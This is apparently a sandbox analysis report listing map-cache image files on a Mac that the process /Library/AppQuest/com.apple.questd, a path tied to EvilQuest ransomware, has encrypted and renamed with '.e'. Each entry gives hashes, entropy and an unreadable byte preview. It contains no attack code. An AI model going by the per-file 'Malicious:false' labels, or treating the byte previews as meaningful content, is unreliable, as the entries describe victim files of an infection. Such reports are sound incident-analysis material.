                                                                                                    Entropy (8bit):6.334020875017725
                                                                                                    Encrypted:false
                                                                                                    MD5:2B0B173B03606F60768BC3696F36CD6A
                                                                                                    SHA1:544D7FB25D521426C71E011A241B88A3E7ABB348
                                                                                                    SHA-256:24AD07C571BD0D524816CF78F29152687ED88AB50E37F35AA29E644E5997C8BC
                                                                                                    SHA-512:CEE443499E565F5B64F946526D144B89A5370B13BE26661B00B4EC4B7045922138305DC5D93F8B99A964EA0F8E82B05E3AFA6DF1116441EFC1B3BA73FC0BAB0B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d....K...vj>8.b$..o......O.p.];......rV...b:Umx..(W....LK....(dp.....w,.i....z....Ke...%..RX.+.}f..=y.e..ux.~K;.k.....7.:~...K.....{.gh...SCHr..c.6..&.8..US..@.E..yR.s....6..W.P.......kM....7.:~...K.....{.gh...SCHr..c.6..&.8..US..@.E..yR.s....6..W.P...&H<.T.=..2Nl. n..-.{..~...........!N.~b..$'0{.X.1................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.land-carplay-1@2x.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):922
                                                                                                    Entropy (8bit):6.803420132236948
                                                                                                    Encrypted:false
                                                                                                    MD5:721FD922DA83FFE3C612A68D966FA7C1
                                                                                                    SHA1:1CD634EFEDD323FFADF05F16A137A395139F616D
                                                                                                    SHA-256:A7578DF5BFBEE8B12A5E3DA04B019E7E13AB2B2160AF8B9341B094E95B068CD9
                                                                                                    SHA-512:785FD6897BFAB215D54E9A9CC12F56898D0F8B9EE4BFB42A73F4EACCEAEADDD58DD45657FC3ACB9BBC4FD230460F483877C549746531FDE86AFF7DBC46470639
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d....K...vj..d.R.{.#....s....|....3..rV...b:Umx..(W....LK....(dp..........t.- M7.......B>....M.H_.M..Ib........."...,.F.l.W7R.d/x.C......p..AD)pi.4S...}.-W.........^.,mp...c....y...@.r>M..7.=S.........S.S...}.-W.........^.,mp...c....y...@.r>M..7.=S....q.E..0L....O.......5..A^.wSU.?......"....m.M..I.7.=S....q.E..0L....O.......5..A..L.f.k......"...,.F.l.W7R.d/x.C......p..AD)pi.4S...}.-WE............"...,.F.l.W7R.d/x.C......p..AD)pi.4S...}.-W.........^.,mp...c....y...@.r>M..7.=S...L.j.....S...}.-W.........^.,mp...c....y...@.r>M..7.=S....q.E..0L....O.......5..A^.wSU.?.g.{....V.....M...Y....I.....#.0......T...i................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.night-DetailedLandCoverPavedArea-2.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):20347
                                                                                                    Entropy (8bit):7.985796881350272
                                                                                                    Encrypted:false
                                                                                                    MD5:29FA2A10ABE3CF39706C600F496D06F6
                                                                                                    SHA1:F9FE16AB943419BD115512D324C64B6E80058855
                                                                                                    SHA-256:E54CEC3AAA7E994C71CD401C12C4369ADD659EF7F8C91B526EE7B31345FD1B4D
                                                                                                    SHA-512:97CA06B1402C24C904EB5EAD854C181EC2264AC72723347DDFC87F367A4B52C9F5F5DE17DEFBD465C83483FD4AA47C02B96F45B360E3E0B1A3E8CBFA14D4327F
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d....K...vj>8.b$..o......O.p.];......rV...b:Umx..(W....LK....(dp...5w.^e.."..+.~.K....xB.|..Y.q.[..m..Z...7..Q.u&B...CJ..\..*..{.{(I$.t.1;..*B.. ........0..........}x.%at...;.j...Pz.k..R....D..'.v...S3..Z.V!<..#.=F.s..eXq....t.P..........L*N.jpV..|.)..BwDpaC6{...gx.R...%...=.1...5..........A...Q...Q.../p.....l..:...nUW2...../.].,Q....N'"..,..].V....5.......'.@...H......QiK..!...bqX.L..i....NT...{g.Z...F.....([c...v....{.Zv;.....N)NH...:..L.9..........J.....&9....0s..SX../...8G.|.V...[..w.n.%...6Q..`..>....5...H.3.l..T<.>.a.-.7.&.v.>.t...M.......Bj............urE/6..)..........^...3....?.OY...uT0...|...N.x.%.....,.....D..%....<_..1.......2..l6.(7.]...._e...-......Xi.....$..,..)...z..r..@...W.....J..^tu...W......(X.\.9...k..|.;R....2WNb..K..^...Ko....l....7.. i.'....7.~d....s...|.j!^n.6....3.5....=~.....7>p)i.q?............9.....0.>*YB..n....[c.A.F..=>...\.Q....-..=s..!S74..2....."[...H\..A+%.N.m.......%.z.....o(.zS..@.9.W.}..%.%................_...%.c>g..$..../J..........e.B_J*.9..
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.night-DetailedLandCoverPavedArea-2@2x.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):90199
                                                                                                    Entropy (8bit):7.9975988745310005
                                                                                                    Encrypted:true
                                                                                                    MD5:60ACBCE68CCD87F15E3B992369F11584
                                                                                                    SHA1:20D3059B2755AA457F0D11D02FEDD827F131E950
                                                                                                    SHA-256:D0AB7676D074795B3BCF06496AE15BBECE47AC144BF96E55B62C340F89096071
                                                                                                    SHA-512:B1F89A60CA998BE637BA69C8651A1E1107FE8218192BFACA4D80E76F7581F53E7F2A8B5A6EF6B6DCBF4765F977158CE9F6C35919FBE6A6FF780B5D5150471B61
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d....K...vj..d.R.{.#....s....|....3..rV...b:Umx..(W....LK...y@...g..H....<.B}.fOB............:..WZGt.&.r.j...I.M.-.m...y.._. i.f...G.9.~T.......)}v~...U.+.X.F.....O.@.Q7}..X.j.7~......r.[.....}W...:.y.....v.yt.v|..~LB..]...p......h8.0N..iUI.5...t.?a..*.>.F......!....$....&.y3...;..G:...|$.......@,oz.)...#8.1.....|........G6.h....t....+.f6.....+*..*S.........<..........t2^.wa.:......7p..+.:.n.$........x.iK.........../....=>\..V.<9....~...l......=.DQUC ...A....m.v..;..W..@f]..?[..VL.h...x..#F.....Pr.R....\....f...\glW..n.\....a...J.%......oN..l8fXF. [!..eNH..`.....QQ..vY....ND..1...i_...h..^..=.+.AN^.X.."......"..x$sx.....U7WRJM*9.#.........[.|(.....*.Ut.&o.L<#.....&.z.3 ...d..b.T...-(p..c]<c.w...@.;*vH.pc$.....H.......b..'..L. .....p...%....R...V.5o...o..y..8...h...}.... ...@.....a...Sm.f._.....P.b.h.C......'....!.'i)..@..-n.............E.D..8.3.dE+t....2..".K;C.....P%Y...u.`]. K.L..#....0.~.......<\jn..C.....;.!....{N....:<G4v.-5>.x.....fR...Q....r......2.......b.q?H!.s.V.Yz....._
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.night-DetailedLandCoverSand-1.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):17971
                                                                                                    Entropy (8bit):7.980711635296148
                                                                                                    Encrypted:false
                                                                                                    MD5:BC468ED7F0617790EFC0BF04A6F3D95C
                                                                                                    SHA1:8DDC0B527E9C9A6FC1286F3BD2C44A5F229E2A3B
                                                                                                    SHA-256:4694CE5EE1B59AB103B2DDD1D2520F815DFC5BAE39B05D0EBA6313EAEDD4A276
                                                                                                    SHA-512:6B1F27FD986358073A93476B8BB14FFCF8A3C9E6F3EDF73DDD9D1A85D2DF079E93CA7E3175940820EFCDA71DA91D5558C8AFDA4FACBC183CA116118019F97750
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d.......v......-..Y..K...vj>8.b$..o.'.......1V..'..1...oL..,.....%1.........e.._...o..W.G..../.... k.....N.{N|...8..R...|..R..e1..O......y1.......k......?I.=}....Ma...V...........w.....wzQ..K.M..0...?..o('.b....V.S.........%.........?.i'..3......K...8.........\...`..e.].|:...........9..$.f. ./O...-.L"`....v...P...............VS}..#N[`:.xg.Xl.YF...2.{.y"....?+....=......D....RT.zz..p.6...Kg...o........N&)....\..Z]ze..Mc.I.{..Q;.....g.!*..z...{......)...=D........G.BQ-...=....C@\....)..M.9B..<.......D..7.......*..X. ..g .c.+i.@...$.)@..w......N}...+|r....l ...=B..78...U..|......^..g...........GAjn....,..T....Nm..J....F.X./.To@.?@..2Hc...DD.......j...u..k.2.3Yh`.!.X....#.....E.?'...soA..:.Ov......GM.....[.El;.$zJ..1U...o..i......K.x.k"...M.........m.Pj..:@..bC.y,]..-M...d).\.g.x6?...Xv.*q..m...'E..j....v...U..y...y..y....h.r.........}..%.++0.....,...u....a..*b......~>...I........E.5..5C....o"........x`....*..T`).0......}.v.'.&E..C......."....K...,'..Y.:Ht...w1..........B.R1."......=u
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.night-DetailedLandCoverSand-1@2x.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):62741
                                                                                                    Entropy (8bit):7.9962322491360505
                                                                                                    Encrypted:true
                                                                                                    MD5:EDC79FA32F79033C9855C2FFB7AFF397
                                                                                                    SHA1:71BFBBD16FFAA251F728262A14171F7135F7B561
                                                                                                    SHA-256:77789530E57FA86EA8BC6C2617111D5290310E3F362E569F109E9F601BEB8ABC
                                                                                                    SHA-512:96232CCF22506D340653763F43C2462B5480BCBE6F2C7BC3A32AE34A79DCF1B7347CA881BDF8E1F0262605E043CF6185C8B5701F9145523CEAD22A74DC35B9FE
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d.......v......-..Y..K...vj..d.R.{..a..k..9'.../Oz.1...oL..!..x4g....s.y..w*<..!.F*....t....P....3.D........E.Q2.&~C.V.\.Q..!....=...17V...s...:...........]6.....r..\|i.H....C...v.BP.@.b.Q.'7.@.......&.l..Fc....8.&#..O...../I.Y[.@S.a.!..0..A......yaq".*v}.C.(..Y.*A...c.D......s.S....&w...$....o..G.\...<...9m..>..@a....+..,.Ml.r@.M{....%8...5......t2........t..gwPp=..0{.NH..d.,y.5.......u..~.E...W2.....l..[..F...].7...T."....$ ..Y*..%z.fy.z03..8yu.?...=....(.E..F4......l4.og3j0....?.......4.}Xl..$..T....GJ..sA..w.......(p..N..|vr.5Tv..(S..\H..._,.........-....?C.8.7mq,.F../...{.....[.),?...ZN.B].gD.z.l...R..M_.#.Y.Z...X..YmjK..t......{.e..T..N.0'n.k...m.l..Y..?........uWm{.)}Bu.k.R..x.3.~L.8..u.F....].......+..C.%.I.......e.2..t..B..........y.zmu.i.H.?X.0R..}...^G.CB...T...1.=uF.*5.?fu..Z.>.....2..`!....'.....0u...p.mf.h.}C.r.3.....r].8...3..J.........u.....MT..ha!L.)I..\VQ.F.G..z...5....L&+.....5Q.Ah.....Q:]..I:.#.................m.....&.O.[.`..t..\..s..N\:R.`...{.~E..r....ed<....
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.night-RealisticRoadHighway-1.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):29443
                                                                                                    Entropy (8bit):7.989893646466781
                                                                                                    Encrypted:false
                                                                                                    MD5:FE268C08141721D6BE208B3496FD160E
                                                                                                    SHA1:73703CDFB420E0E509B46F1329ED16D1D4F3454D
                                                                                                    SHA-256:D16661832DBACD12A0435E8139821601899733DD957CD2F18A09127236421389
                                                                                                    SHA-512:DDAB16C3BE9D9235CD98E1D0EE468142DD43DF925B0E7FE5F760A62F7312D839434FE69B425C657962EB381912A1411B0547EC1F62F34D91465CDB3DF55D7129
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d.......v......-..Y..K...vj>8.b$..o.'.......1V..'..1...oL..,.....%1.........?.$W:.0.2...jjB.wg1.s;..F.SB.5..G...J..4E..=....d....R..p%.i......-....gD.7.. ).].L`...6..\t_..I!.h.1..6.M.....:._..R.....s.+B9...B..N..P...Y...8.p.....'.K.@[..m......QH~....-.)...w.u..?.&8(YW3.R .....J./BG.?.pTiIY...q...c.=L.i..R..-HY@....q%.....,....V...NRN.."..E.F..~...$..JjM......i;G.....4..S=..j\,.P.....l).1.9......]..G..&.....!}.. ...a...D..}..~q'.T...V....3......q9'..~.....9...~,.W..b....f.@.........7$...O.K2............H..RW...Be.......p......[.........l.......s.D... l.....I......#...{d.<g._'E5.....d32s.)......9,......x...{ioPyA.....M.w....o...!...............H...!o.y.-.5}...y....e.,..'.......X8...`..%..bN..Zf.q.C..I......oo...p..j.i}....y...O.......f<D.......>&.V...@.d...y..f.xHbS.%.).rQ......l..R<!....t.KI6..?O...C......K.sQ ..N....h5.T89...~2..A.....Q#./...<.}.2.,..2.]D.0..uk5.*/...E.>\......^...`s2c.../^A...Y.......$.lq...%.K..)......I".......W&eU..!.o...~.s..8.F....)...&..J.A>........?P....m..
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.night-RealisticRoadHighway-1@2x.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):142706
                                                                                                    Entropy (8bit):7.998557196088341
                                                                                                    Encrypted:true
                                                                                                    MD5:AF439C8681CCB6C78BED27C328962889
                                                                                                    SHA1:8D855A8489453A36E2DC4546506D584B9F384ADA
                                                                                                    SHA-256:4FB2D9C29F96B25350CA5BC4F439F6E1C4219017F250683530E58FA6A2050CAA
                                                                                                    SHA-512:84635E7E8836AF2289EB3121094249FC81F6D26E07FB38A8B2F03C6D266B2D9A5BCAB274F177EBF1F8171FCB396D588306931C553A09A0933E75E9A0869E29CC
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d.......v......-..Y..K...vj..d.R.{..a..k..9'.../Oz.1...oL..!..x4g....s.y..w/........`R...... .B.....c.&'.().0X..K.c%.....g..=....*......n.b...=.3+..i.4m.3..ZCp.(.>Z(O...^....%[.L..`...6. ..W.....z...)QmkL(..9....6:.........uZ...B.-.@H6W.*....2..<.m.....)Q.....>..../|.c..%..5...$.....g.stU...<u:...{.......^.A)...r...t.P.-&.q....d._....}eDI..U......8...=...e.|T/..$......_EZ..F:.....HH"W..-.@.SV...%.....o...........f%....%..."Y.......w#H..2...$.....%[.2.Ug=.P].l}.z_...y...;VD....]?,f<.'....hu.JQ..._.t.t).Q..4'<..B.E.0.FT-.........U.j.7{.4.L1g8W...$......{.F...{...9........9..d.(.3...|...*d....G.9..&cG.t<.^y...n.N.Q..<...$........v...ekS./...w..|....Q.k&..,...p....;..{....yIA...s....\....@....QP.XkkD~A...q..B....@.....#.|....k....(b%a..Po..W..F9G..^.c(...3...&{T....g..>_.....).....XU;...+(S.L....!..$p..E,...5Z..F`..HVr..%.:..H.#_..l9..(...<...E..j/...2.:..p.9..@.~I.S.5*...}/.. v./.)/.bH.0....]......24............s.2......{69AB4.?J=.44.....;D..+m_g..h/..KI.7'......sa.Y..g)..9..#.....(+
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.night-RealisticRoadLocalRoad-1.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):29715
                                                                                                    Entropy (8bit):7.99018646925451
                                                                                                    Encrypted:true
                                                                                                    MD5:CDD0DE58FE7CDF6656983EDA3DAFFDAF
                                                                                                    SHA1:C81335035B3D9C01C4F4FBCB926F25AE1E394129
                                                                                                    SHA-256:29AE6A825BA2C38A7FD631EE97C2A5216FECB3E6D659BDF54A1F63C37A176F8C
                                                                                                    SHA-512:B314F6FF4C9CA3CC06D8D211047915A862F832122C7D28C07577B57BAE454B6902FB2087C15AEAAE146C0E90DADF878C5C58B217ED64D5793A000F9EF9EA48A2
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d.......v......-..Y..K...vj>8.b$..o.'.......1V..'..1...oL..,.....%1...........-.?.s.h.........4.^...1..C.UAi...0...y.R._..d..wJ9}rn.2N..o?o..s.D.l...8..oDv..{.A.Q......)...:....l....m...L..\.........L.ml..I.X.OR(.l..E.ELi.8.ca.y.Y.|p.....*Y...'....FE FXV.k{..d....j.FZ..uK$.....J?.,.g*..Q...[..Y.v......C..E-v....#...7Y2@.U..D?....b.....*[......!...'.....{0...%}j....k...~vu.2t..u..^uw...i....Ic@?!.XY..??\.Q.x..t.<.MW...m...j^..|..J..0..%..\b.\ShO..g..U..].)(..4...H.%..W.G..:K.....b..&....y.R.....X,b........A....:`.x..'..0Xw..s.~..q'eY............=.........k..?..+.e,$.......p..Q.].:W...'.F..%..f.....m..G.|..eU...P..GVi.....7....." ..m...I-o.D..,"........<.....m.....u6.............4......%...7....&?o...\U.:.....~"..-O.....U.)..#I9..D7xM.t..=...,.A........4..zX.|. J?..1.Z.....o{.|...d..........;q..?3R.B...t.g..|e:.N........r.l.%..wo.........j......#.[.........|5..l....P.#..bP......&...a.|." .3..u.)#5...................@<LC [...\m\....8G]....,.|.A[..b....k.....J..*P.&..?]...../...'.)...
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.night-RealisticRoadLocalRoad-1@2x.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):141042
                                                                                                    Entropy (8bit):7.998628951892466
                                                                                                    Encrypted:true
                                                                                                    MD5:10082EC97826378985F4EB86CBE77E30
                                                                                                    SHA1:8FD31D3D358572932A6D2286A1FD1D4A624B82D9
                                                                                                    SHA-256:AD74665DBD6DE8C7D71FD617159C77778B0251E0306B30BAC4480C40A8EDBF34
                                                                                                    SHA-512:54BD2E831C4998D270509CB4702BA5D6B226D7F1E8DE2A5E3D68F5BCA6072B7A0C5AF580190F5A25FA09C91E533CF17C0AFEC71B83E8875F5934091B39B68CA6
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d.......v......-..Y..K...vj..d.R.{..a..k..9'.../Oz.1...oL..!..x4g....s.y..w%........../..U.|..gt.B.l.2.{I....in...)p.th..<.o.__D...5.m....E.....f..9.2Y..U...t.g...:$..%u=?...Jk..g..>..,..,.T......R...=..qB.k....ad.....f.6...,F&...#....;w[..u.o\......mFALj!m......7..}J2RZ~y..S...>..@....J...u....{....%..ztu.......P.(.....J.....4.....+.d..$..W0...../ ...E]g.f..JK.@#-...%`FU.Yh.../............7/34.9.!A... ..H.6O..L....w..9...=.f%N._.3_..-...6..;..Ak[.... K..A)0.w~.. ..x`6W.....c.n.B*..........{ p..T.t..`m..Y...4.`....F.|.w..>..7.......3#....W.$p^[..l.e..h...IE.V\|......Gs.i...yH..qE8............\.*..#e........d./..b.,....M~.....K..B.AQw..>/M.......i.y5.hQ....B....nq".i.k~....;......pN.;......R.\.?w.j..G.@...9..+.Q0?./Y>..b....#.o..M..!.....[0.k............:..-...#.S.!..d.r...S)..6.W...XE...X..'.h...H..M........g..T....Ea.o..L-5..r.yf.F.l;IQ....)cj2'..W....^..`.....f.-..I.k.....w"b.....Hb.`<.|.....W.....5..m...6.i...(.....Q........Q.C.<.k........VJ.....+rp.!.2.}.^...I....../....W....}
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.night-cemetery-2.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):18931
                                                                                                    Entropy (8bit):7.9808580196726355
                                                                                                    Encrypted:false
                                                                                                    MD5:F8C53472E48090253F8D57A6842191B5
                                                                                                    SHA1:E6C4D18A99F488E19773B4D39EB03A13722331EB
                                                                                                    SHA-256:DE2F0883E56F33CB47CF69CEFFF5ED1140C4BD04D4AE631F0E4C508281654DDD
                                                                                                    SHA-512:91CE1D59A78468082A07788582775AFFA192857F5974A5DC051FF0BB7018558EEE19792A04352FF44F8F4086CE730C0F2C4C636179F65D1E30166CC86B2FCE4D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d.......v......-..Y..K...vj>8.b$..o.'.......1V..'..1...oL..,.....%1.............6xx...q%.1`..'..U.9.).b......A*ip.0{_.IlW.....sL`.L.mO00..EG.F....7.a...i..{......;....N.b.{oc....v....~..E.@.?xp.)C.t.....[o....$d.OF........C$.a...Q.If].n..1.....Y../r...`..N.........~.....:...1.c&:6.z..<.H...5..zj@.q.hR-P.W..#...S..G.F9.....\...#...>p.U._...5LF..c..J....d]...*Q....Sh.T.....1,..-TuT.s#........2....6......>k.wr.N@...........+...}.......b..Rb.{......C..X...}...1rtL7jT....i,\*$..w..../.6.#"...a=..!1...mf......&.5-6.9p.h.Y.9.....[z>....z_)WY.2....p.(.)|...f>...,.!~:Bc...h..D\...v...(=.....o......+..^[..Jh..L....|Q.\._..j.....W.i2..3..u...:...1...x........%.5..........%;n...../qZ%{..L....j5.Fw......D....7..D...S................f._..(..q..:.....z..Sn..>...3..!...6..y....jmsY#..~...... ..ek1g...d..ZI...p..;...~.O.4.../..$..{......EI.>..h....K.......a..qZ^.?x.v=.....q.C.Wv..bet.K...u.3..J...>./..-..........W.. ..#.s.{......JG..[3.`]2[.....a.......]Sy.).-(.Ay...N7.....+..]{x..Ra.F@.P!.......n
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.night-cemetery-2@2x.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):53701
                                                                                                    Entropy (8bit):7.995269471966059
                                                                                                    Encrypted:true
                                                                                                    MD5:E16B21F4EAF2A6158B7454B08B31595F
                                                                                                    SHA1:41A29742922F8EEF3AC4C0DF6345B23ECE3F8C6B
                                                                                                    SHA-256:E224855A65C1FE6F8F94EA720E8F5A024D1DB24563B4E0AC5D5A0990A00E7268
                                                                                                    SHA-512:BD7D4E13FD0D45015BA63C2F3142821592A86A6B98B1589BB25629CCECE72B5618DF3625D184F987B902780CA34B0FA9C328A06B408B89B159532473531B1267
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d.......v......-..Y..K...vj..d.R.{..a..k..9'.../Oz.1...oL..!..x4g....s.y..w=>..N...M..8..........v...a7.-..^.P.e:.6&.~.."....A.....t.$.E.F......4..xp.wm.c.S..\mK.z...@..:.p..p"..8/z...n.\V...G....... .A.F....56,"..:...Vp.k.w...sD`ETD...%b[.hV..!+W.......*...V...0..UJ-....g......b.........~.&0A.$.....0.... Z@.C.....7Vg2 .O.lD_..{..G.LJ.TwW.H.....P...D..!...t...qi.dPjPy...D.O.z..Y#.nv.B.3%.n...4..!....@+*DZ..-.4..d....J.N7*.....dom"..D..'o...N.....Xz..].h...4.g..._Tgos..v.V]SHc!+'.....'DK...aE.<~.2.J&.^..i..e...Jww..?...>..HPn.......Z.A"..N.x<..........6.CWu..I.Y..M..s....."...X...g6...n.....<-.Y......w. _E.....-w.[.|@...)....x..s.q..|....V..vV.IR.S.g.......qe|. ..(.qI].&...7.v..!.....a`.\.uBv..|fH....O..d..x...U..Tgb.......WqI....|..T).xo...u.6.[...........KP.N.....'.-H.x.....-.<.-i.~..q........X...e.......K..}.1..R....%.D...o...J..'.`...dq.N...).........:.........l...I9d.bU.n.".V......7(.I d0..S....9K..p,..Z........t)M...[Tt...u.^#..n..6.4...4c.3c...."Us.Lg.#.{...Py..Q...*.4n....D
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.night-concrete-1.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):21603
                                                                                                    Entropy (8bit):7.984936019936792
                                                                                                    Encrypted:false
                                                                                                    MD5:CBEB8995A524A09608A8EA468E9356AB
                                                                                                    SHA1:13E9B51D9AB4D5F8F8B26C3EEA6D8557DCEE297C
                                                                                                    SHA-256:4C07F685AD85F64D5205B3979FAA6B2E82CBAC3E143E724D6C27280234A335FE
                                                                                                    SHA-512:C4861659DBBDE967142E84E19DC799438C725FD3B135803DF98079E4C0A899B54D3175FA8BEDCF10134FC599CC04B52E9F167F3C03DBFDC6AF3934F0E24B28C9
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d.......v......-..Y..K...vj>8.b$..o.'.......1V..'..1...oL..,.....%1........O@.-.O6....nf1sf...[.u"yp......l?N...........yF.G.....=).w..'b.8Bo.P(._.*j...4.....S1q.=?f.&.^v.....!U>.......okx.d...3..jM..........GU...Mv.....yzT....<S.P..x2..tLe=.^,r..jr/...5..I..f.?.7..*v.....$....sP....o..-....;jag^.D.A8..a.wg........1%....`[....!.LD......0........B...V\'Q.x....J....P.H../..-..*.E.#M.....JU.P.$.).._.....~*.D.~....x.K.A..?.i..w....s..hr...@.}.K....q...K....2..~`.Zt.\n1...o.....c..gO..A.:....aR.8.%.h.9.^!....../?.Ru1..EU..]....-D...k....7Qx....b2W(3..y...w. .......<9.)..d."&.+....Z.E....V(W..9;8....50.7...rx..._...1]...6.V,.....T.....z).2.p."d.W...r..(>"S....m.....I.G.XL.N)J..Hn_.i...l.WM.Ks.4D.=s.(3.....7..B.Yh...&.=vB...De.3.K%,....K~K.........0..-u5.~..\.a....jZ......v.[...L#......^....-..>..G.f...J..N~D...c'A.m.xU4.m..T.l@.....I....E..,.....x..6...C-......&.....6{.O..#.J.k...f..s........xb.o."..L..1....I.....+^....Z.Q.G.{Y.....4'..l....P...w,..l@...,..S:9.....5.94.......q...[......
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.night-concrete-1@2x.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):86823
                                                                                                    Entropy (8bit):7.997011167039367
                                                                                                    Encrypted:true
                                                                                                    MD5:E117AE77A150E94BCD61333B087EDC78
                                                                                                    SHA1:5DAE22CFCA4A64E9E834391E1807CF91DD796121
                                                                                                    SHA-256:05BF36FE07FB7FE78F637FE532393BABADD24395B84132EC68F536508A146751
                                                                                                    SHA-512:8DF5DED99B251BF99F9B025C23F6882D18CD5E293F7BF0ACB24AD6BA8C3E7C5B4B5023F01E36458CB908364A25FBBD7DE76279AB0476DD1D9374C1F6C9389F54
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d.......v......-..Y..K...vj..d.R.{..a..k..9'.../Oz.1...oL..!..x4g....s.y..w..u.wZ...>.O..z.+VQ.....|...)..a9.........9.u.p.......}..>1.*.L..-.T........8x..m."..$&.c..[......._9!...9x..q....a..s.."LCOI.e..89c.....\p.[....c....h....Kz0..RM.;....c.6..y(.Y..B-.....M.lQZ...D........-zb.b.8.q.....G.R#....Z....(c.).*67....Z.....9P..Z.Zw./...To.'2e2..HV.m..O&4A<.......8....h..........sF)...... .... ..H~rDf..?=..g,2@.S.........../U.....;.........ou-'...A.........!.?...kj~..;..B....t=..{.......o..+...W.....6...y.Xp.%..P......f.........L.[NJ..U......F.q0...PjI0a...V^..xW..o...k..7..d^.O....".m..R.G$.....~.-... .....Xc......a.5.B~..../..(.>W..D.nE-Z..'.h*........,....*&w&.q..dF.4F......^T......../.b...(...z....FEh".._pH.aK.....bZ?/...W?.^z1...qr\...I...F.F.X....../(f..^.....l.."..........2..3Og.....n.9fbG.*.T.....;..JX..Bs..>v....}O.......l..-=...ao..-...QX...K...6B...btd......[...P]..R..So.E.|N....yt....->;...k.T...c.Z...O....Y.v."<+.,<.S>b....6gt.~O..........?...o..)q.Wm_DK....i..NM..oav.,.
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.night-golf_course-2.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):19763
                                                                                                    Entropy (8bit):7.984462318072868
                                                                                                    Encrypted:false
                                                                                                    MD5:78410A69859CAF9FBB9BD8C08E2CB915
                                                                                                    SHA1:C356D76AF885CE226C10228711D49F04A1F53DE5
                                                                                                    SHA-256:11E231964F573F118F00919B0888E88552B4DF1B98ACE176794B315E9100BE6A
                                                                                                    SHA-512:EDC5E833BD2AA12F8DCC2E8F6C6273C8FF8E94C85C43CBDE96F291D3E171B7832CB35A0EF91CF2BCB483151DF4018665858E1F3DBADCBECC1D583FC5DC5BD6E9
                                                                                                    Malicious:false
                                                                                                    Reputation:low
